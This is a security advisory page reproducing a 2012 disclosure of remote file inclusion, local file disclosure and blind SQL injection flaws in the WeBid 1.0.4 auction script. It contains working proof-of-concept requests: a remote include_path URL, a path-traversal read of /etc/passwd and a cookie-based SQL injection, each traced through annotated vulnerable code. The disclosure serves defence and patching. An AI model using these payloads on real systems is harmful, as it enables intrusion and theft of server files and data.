WeBid 1.0.4 RFI / File Disclosure / SQL Injection

2012.08.18
Credit: dun
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-98

:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ posdub[at]gmail.com ] [ 2012-08-17 ] ################################################ # [ WeBid <= 1.0.4 ] Multiple Vulnerabilities # ################################################ # # Script: "Open source php/mysql fully featured auction script" # # Vendor: http://www.webidsupport.com/ # Download: http://sourceforge.net/projects/simpleauction/files/simpleauction/ # ################################################ # [RFI] ( allow_url_include = On; register_globals = On; ) # PoC: http://localhost/WeBid/loader.php?js=admin/logout.php&include_path=http://localhost/info.txt? # # File: ./WeBid/loader.php (lines: 15-60) # ..cut.. # ob_start('ob_gzhandler'); # header("Content-type: text/javascript"); # include 'includes/checks/files.php'; // 1 ( Definition of $file_hashs array ) # if (isset($_GET['js'])) # { # $js = explode(';', $_GET['js']); // 3 js = admin/logout.php (for example) # foreach ($js as $val) # { # $ext = substr($val, strrpos($val, '.') + 1); // 4 # if ($ext == 'php') // 4 # { # if (check_file($val)) // 5 # { # include $val; // 10 include admin/logout.php # } # } # ..cut.. # } # } # ob_end_flush(); # # function check_file($file) # { # global $file_hashs; // 6 # $tmp = $file_hashs; # $folders = explode('/', $file); // 7 $folders = Array([0] => admin, [1] => logout.php) # foreach ($folders as $val) // 8 This loop checks if parts of $folders are in $file_hashs # { # if (isset($tmp[$val])) # { # $tmp = $tmp[$val]; # } # else # { # return false; # } # } # return true; // 9 admin/logout.php passed # } # ..cut.. # # File: ./WeBid/includes/checks/files.php (lines: 2-19) # ..cut.. # $file_hashs = array( // 2 List of files that can be included. # ..cut.. # 'admin' => array( // 2 # 'logout.php' => 'a0db39b73dcfd29feb1466002c4f59a4', // 2 # ..cut.. # ), # ..cut.. # ); # # File: ./WeBid/admin/logout.php (lines: 16-17) # ..cut.. // 11 common.inc.php file contains a definition of $include_path # include '../includes/common.inc.php'; // 11 Failed, because loader.php is in root path # include $include_path . 'functions_admin.php'; // 12 *[RFI] $include_path is not set by script # ..cut.. // 12 If register_globals is On, we can set $include_path # ################################################ # [Local File Disclosure] ( magic_quotes_gpc = Off; php version < 5.3.4 ) # PoC: http://localhost/WeBid/getthumb.php?fromfile=getthumb.php&w=../../../../../etc/passwd%00 # # File: ./WeBid/getthumb.php (lines: 17-52) # ..cut.. # $w = (isset($_GET['w'])) ? $_GET['w'] : ''; // 1 # $fromfile = (isset($_GET['fromfile'])) ? $_GET['fromfile'] : ''; // 2 # $nomanage = false; # ..cut.. # if (!isset($_GET['fromfile'])) // 3 # { # ErrorPNG('params empty'); # exit; # } # elseif (!file_exists($_GET['fromfile']) && !fopen($_GET['fromfile'], 'r')) // 4 # { # ErrorPNG('img does not exist'); # exit; # } # # if (file_exists($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile))) // 5 # { # $img = getimagesize($fromfile); # if ($img[2] == 1) # { # $img['mime'] = 'image/png'; # } # header('Content-type: ' . $img['mime']); # echo file_get_contents($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile)); // 6 *[LFD] # } # } # ..cut.. # ################################################ # [Blind SQL Injection] ( magic_quotes_gpc = Off; ) # PoC: # http://localhost/WeBid/contents.php # GET /WeBid/contents.php HTTP/1.1 # Host: localhost # User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1 # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 # Accept-Language: pl,en-us;q=0.7,en;q=0.3 # Accept-Encoding: gzip, deflate # Connection: keep-alive # Cookie: WEBID_ONLINE=-1' OR 1=1-- # # File: ./WeBid/contents.php (lines: 15, 38) # ..cut.. # include 'includes/common.inc.php'; # ..cut.. # include 'header.php'; // 1 # ..cut.. # # File: ./WeBid/header.php (line: 26) # ..cut.. # $counters = load_counters(); // 2 # ..cut.. # # File: ./WeBid/includes/functions_global.php (line: 287-320) # ..cut.. # function load_counters() // 3 # { # ..cut.. # if (!$user->logged_in) # { # if (!isset($_COOKIE['WEBID_ONLINE'])) # { # $s = md5(rand(0, 99) . session_id()); # setcookie('WEBID_ONLINE', $s, time() + 900); # } # else # { # $s = $_COOKIE['WEBID_ONLINE']; // 4 # setcookie('WEBID_ONLINE', $s, time() + 900); # } # } # ..cut.. # $query = "SELECT id FROM " . $DBPrefix . "online WHERE SESSION = '$s'"; // 5 *[SQL] # $res = mysql_query($query); # $system->check_mysql($res, $query, __LINE__, __FILE__); # ..cut.. # ### [ dun / 2012 ] #############################

References:

http://www.webidsupport.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top